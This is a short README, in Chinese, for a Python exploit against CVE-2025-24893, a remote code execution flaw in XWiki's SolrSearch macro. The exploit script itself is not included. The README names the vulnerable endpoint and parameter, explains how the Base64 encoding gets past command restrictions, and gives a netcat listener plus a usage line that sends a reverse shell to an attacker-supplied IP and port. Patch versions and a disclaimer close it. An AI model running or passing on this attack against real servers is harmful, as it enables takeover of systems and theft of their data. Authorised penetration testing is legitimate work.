XWiki 远程代码执行 (RCE) 漏洞利用
一个针对 CVE-2025-24893 的 Python3 漏洞利用程序,该漏洞是一个影响 XWiki 平台的严重未认证远程代码执行 (RCE) 漏洞。
该脚本利用了 SolrSearch 宏组件中的代码/表达式注入漏洞 (CWE-95)。该漏洞允许攻击者在底层操作系统上执行任意 Groovy/Java 代码。漏洞利用程序会自动进行 Base64 编码,以规避 Java 的 Runtime.getRuntime().exec() 函数的命令解释限制。
/bin/get/Main/SolrSearch (通过 text 参数)nc -lvnp 4444
python3 CVE-2025-24-893.py <URL_ALVO> <SEU_IP_VPN> <SUA_PORTA>
示例:
python3 CVE-2025-24-893.py http://domain.local 10.10.14.229 4444
requests 库要安装必要的依赖项:
pip install requests
请将你的 XWiki 实例更新至以下官方修复版本之一:15.10.11、16.4.1、16.5.0-rc-1 (或更高版本)。
此脚本仅用于教育目的、授权的安全审计和渗透测试。作者不承担因使用本工具而造成的任何滥用、损害或非法活动的责任。未经授权对目标使用此脚本是严格违法的。